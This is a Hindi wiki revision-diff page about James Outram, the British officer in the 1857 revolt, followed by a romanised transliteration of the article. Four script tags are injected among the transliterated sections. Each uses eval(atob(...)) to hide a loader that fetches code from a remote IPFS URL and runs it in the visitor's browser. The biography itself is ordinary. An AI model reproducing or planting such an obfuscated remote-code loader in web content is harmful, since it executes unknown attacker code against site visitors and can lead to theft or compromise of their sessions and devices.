Difference between revisions of "जेम्स आउटरम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:अंग्रेज़ी शासन (को हटा दिया गया हैं।))
 
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
जेम्स आउटरम गदर के समय अंग्रेज़ों का एक वीर नायक था। वह 1819 ई. में एक कैडेट (शिक्षार्थी सैनिक अधिकी) के रूप में [[भारत]] आया। 1820 में अपनी चुस्ती के कारण वह [[पूना]] में एडजुटेंट बना दिया गया।  
+
{{tocright}}
==परिचय==
+
'''जेम्स आउटरम''' गदर के समय [[अंग्रेज़|अंग्रेज़ों]] का एक वीर नायक था। वह 1819 ई. में एक कैडेट (शिक्षार्थी सैनिक अधिकी) के रूप में [[भारत]] आया। 1820 में अपनी चुस्ती के कारण वह [[पूना]] में एडजुटेंट बना दिया गया। जेम्स आउटरम को 1825 ई. में ख़ानदेश भेजा गया। वहाँ के भील उससे बहुत प्रभावित हुए। उसने भीलों को पैदल सेना में भर्ती किया। उनको हल के हथियार दिये। यह पलटन स्थानीय चोरों की लूटमार रोकने में बहुत ही सफल सिद्ध हुई। 1835 से 1838 ई. तक वह [[गुजरात]] में पोलिटिकल एजेंट रहा। 1838 ई. में उसने अफ़ग़ान युद्ध में भाग लिया।
1825 ई. में उसे ख़ानदेश भेजा गया। वहाँ के भील उससे बहुत प्रभावित हुए। उसने भीलों को पैदल सेना में भर्ती किया। उनका हल के हथियाद दिये। यह पलटन स्थानीय चोरों की लूटमार रोकने में बहुत ही सफल सिद्ध हुई। 1835 से 1838 ई. तक वह [[गुजरात]] में पोलिटिकल एजेंट रहा। 1838 ई. में उसने अफ़ग़ान युद्ध में भाग लिया। उसने गज़नी के क़िले के सामने शत्रुओं के झण्डे छीन लेने में व्यक्तिगत रीति से वीरता प्रदर्शित की, जिसके कारण उसका बहुत नाम हुआ। 1839 ई. में वह सिन्ध में पोलिटिकल एजेंट नियुक्त हुआ। उसने अपने उच्च अधिकारी सर चार्ल्स नेपियर की नीति का विरोध करके, जिसके फलस्वरूप [[सिंध प्रांत|सिन्ध]] के अमीरों से युद्ध हुआ, अपने सबल व्यक्तित्व तथा अपनी न्यायप्रियता का परिचय दिया। परन्तु जब युद्ध छिड़ गया, तो उसने 800 बलूचियों के हमले से हैदराबाद रेजिडेंसी की वीरतापूर्वक रक्षा की। इसके फलस्वरूप सर चार्ल्स नेपियर ने उसकी तुलना प्रसिद्ध फ़्राँसीसी वीर बेयार्ड से की।  
+
==न्यायप्रिय व्यक्ति==
 
+
जेम्स आउटरम ने [[ग़ज़नी]] के क़िले के सामने शत्रुओं के झण्डे छीन लेने में व्यक्तिगत रीति से वीरता प्रदर्शित की, जिसके कारण उसका बहुत नाम हुआ। 1839 ई. में वह [[सिंध प्रांत|सिन्ध]] में पोलिटिकल एजेंट नियुक्त हुआ। उसने अपने उच्च अधिकारी [[सर चार्ल्स जेम्स नेपियर]] की नीति का विरोध करके, जिसके फलस्वरूप सिन्ध के अमीरों से युद्ध हुआ, अपने सबल व्यक्तित्व तथा अपनी न्यायप्रियता का परिचय दिया। परन्तु जब युद्ध छिड़ गया, तो उसने 800 बलूचियों के हमले से [[हैदराबाद]] रेजिडेंसी की वीरतापूर्वक रक्षा की। इसके फलस्वरूप सर चार्ल्स नेपियर ने उसकी तुलना प्रसिद्ध [[फ़्राँसीसी]] वीर बेयार्ड से की।
1854 ई. में वह [[लखनऊ]] में रेजिडेंट नियुक्त हुआ। 1856 ई. में उसने [[अवध]] का राज्य नवाबों से ले लिया और उसके अंग्रेज़ी साम्राज्य में मिला लिये जाने के बाद प्रान्त का पहला चीफ़ कमिश्नर नियुक्त हुआ। जिस समय गदर हुआ, वह [[फ़ारस]] में था। उसे शीघ्रता से फ़ारस से बुला लिया गया और [[कलकत्ता]] से [[कानपुर]] तक की रक्षा करने वाली बंगाल आर्मी का कमांडर नियुक्त किया गया। उसने लखनऊ रेजीडेंसी का मोहासरा उठाने में हैवलाक की भारी मदद की और विद्रोहियों को चकमा देकर रेजिडेंसी में फँसी फ़ौज को निकाल ले आया। इसके बाद उसने लखनऊ पर पुन: अधिकार करने में सर कालिन कैम्पबेल को मदद दी। गदर के समय उसने लोमड़ी जैसी चालाकी तथा सिंह जैसी बहादुरी का परिचय दिया। ब्रिटिश पार्लियामेंट ने इसके उपलक्ष्य में उसे 'बैरन' की पदवी प्रदान की और उसकी आजीवन पेंशन नियत कर दी। कलकत्ता में स्थापित उसकी घोड़े पर सवार मूर्ति मूर्तिकला का उत्तम उदाहरण थी।
+
==चीफ़ कमीश्नर तथा बैरन की पदवी==
 +
सन 1854 ई. में जेम्स आउटरम [[लखनऊ]] में रेजिडेंट नियुक्त हुआ। 1856 ई. में उसने [[अवध]] का राज्य नवाबों से ले लिया और उसके अंग्रेज़ी साम्राज्य में मिला लिये जाने के बाद प्रान्त का पहला चीफ़ कमिश्नर नियुक्त हुआ। जिस समय गदर हुआ, वह [[फ़ारस]] में था। उसे शीघ्रता से फ़ारस से बुला लिया गया और [[कलकत्ता]] से [[कानपुर]] तक की रक्षा करने वाली बंगाल आर्मी का कमांडर नियुक्त किया गया। उसने लखनऊ रेजीडेंसी का मोहासरा उठाने में हैवलाक की भारी मदद की और विद्रोहियों को चकमा देकर रेजिडेंसी में फँसी फ़ौज को निकाल ले आया। इसके बाद उसने लखनऊ पर पुन: अधिकार करने में सर कालिन कैम्पबेल को मदद दी। गदर के समय उसने लोमड़ी जैसी चालाकी तथा सिंह जैसी बहादुरी का परिचय दिया। ब्रिटिश पार्लियामेंट ने इसके उपलक्ष्य में उसे 'बैरन' की पदवी प्रदान की और उसकी आजीवन पेंशन नियत कर दी।
 
==मृत्यु==
 
==मृत्यु==
उसने [[1860]] ई. में अवकाश ग्रहण किया और [[1863]] ई. में इंग्लैण्ड में उसकी मृत्यु हुई।
+
कलकत्ता में स्थापित जेम्स आउटरम की घोड़े पर सवार मूर्ति मूर्तिकला का उत्तम उदाहरण थी। उसने 1860 ई. में अवकाश ग्रहण कर लिया था और 1863 ई. में [[इंग्लैण्ड]] में उसकी मृत्यु हुई।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 18: Line 19:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
__INDEX__
+
==संबंधित लेख==
 
+
{{औपनिवेशिक काल}}
 
[[Category:औपनिवेशिक काल]]
 
[[Category:औपनिवेशिक काल]]
 +
[[Category:आधुनिक काल]]
 
[[Category:अंग्रेज़ी शासन]]
 
[[Category:अंग्रेज़ी शासन]]
 +
[[Category:इतिहास कोश]]
 +
__INDEX__
 +
__NOTOC__

Latest revision as of 14:27, 18 October 2011

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jems autaram gadar ke samay aangrezoan ka ek vir nayak tha. vah 1819 ee. mean ek kaidet (shiksharthi sainik adhiki) ke roop mean bharat aya. 1820 mean apani chusti ke karan vah poona mean edajuteant bana diya gaya. jems autaram ko 1825 ee. mean khanadesh bheja gaya. vahaan ke bhil usase bahut prabhavit hue. usane bhiloan ko paidal sena mean bharti kiya. unako hal ke hathiyar diye. yah palatan sthaniy choroan ki lootamar rokane mean bahut hi saphal siddh huee. 1835 se 1838 ee. tak vah gujarat mean politikal ejeant raha. 1838 ee. mean usane afagan yuddh mean bhag liya.

nyayapriy vyakti

jems autaram ne gazani ke qile ke samane shatruoan ke jhande chhin lene mean vyaktigat riti se virata pradarshit ki, jisake karan usaka bahut nam hua. 1839 ee. mean vah sindh mean politikal ejeant niyukt hua. usane apane uchch adhikari sar charls jems nepiyar ki niti ka virodh karake, jisake phalasvaroop sindh ke amiroan se yuddh hua, apane sabal vyaktitv tatha apani nyayapriyata ka parichay diya. parantu jab yuddh chhi d gaya, to usane 800 baloochiyoan ke hamale se haidarabad rejideansi ki viratapoorvak raksha ki. isake phalasvaroop sar charls nepiyar ne usaki tulana prasiddh fraansisi vir beyard se ki.

chif kamishnar tatha bairan ki padavi

san 1854 ee. mean jems autaram lakhanoo mean rejideant niyukt hua. 1856 ee. mean usane avadh ka rajy navaboan se le liya aur usake aangrezi samrajy mean mila liye jane ke bad prant ka pahala chif kamishnar niyukt hua. jis samay gadar hua, vah faras mean tha. use shighrata se faras se bula liya gaya aur kalakatta se kanapur tak ki raksha karane vali bangal armi ka kamaandar niyukt kiya gaya. usane lakhanoo rejideansi ka mohasara uthane mean haivalak ki bhari madad ki aur vidrohiyoan ko chakama dekar rejideansi mean phansi fauj ko nikal le aya. isake bad usane lakhanoo par pun: adhikar karane mean sar kalin kaimpabel ko madad di. gadar ke samay usane lom di jaisi chalaki tatha sianh jaisi bahaduri ka parichay diya. british parliyameant ne isake upalakshy mean use 'bairan' ki padavi pradan ki aur usaki ajivan peanshan niyat kar di.

mrityu

kalakatta mean sthapit jems autaram ki gho de par savar moorti moortikala ka uttam udaharan thi. usane 1860 ee. mean avakash grahan kar liya tha aur 1863 ee. mean ianglaind mean usaki mrityu huee.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>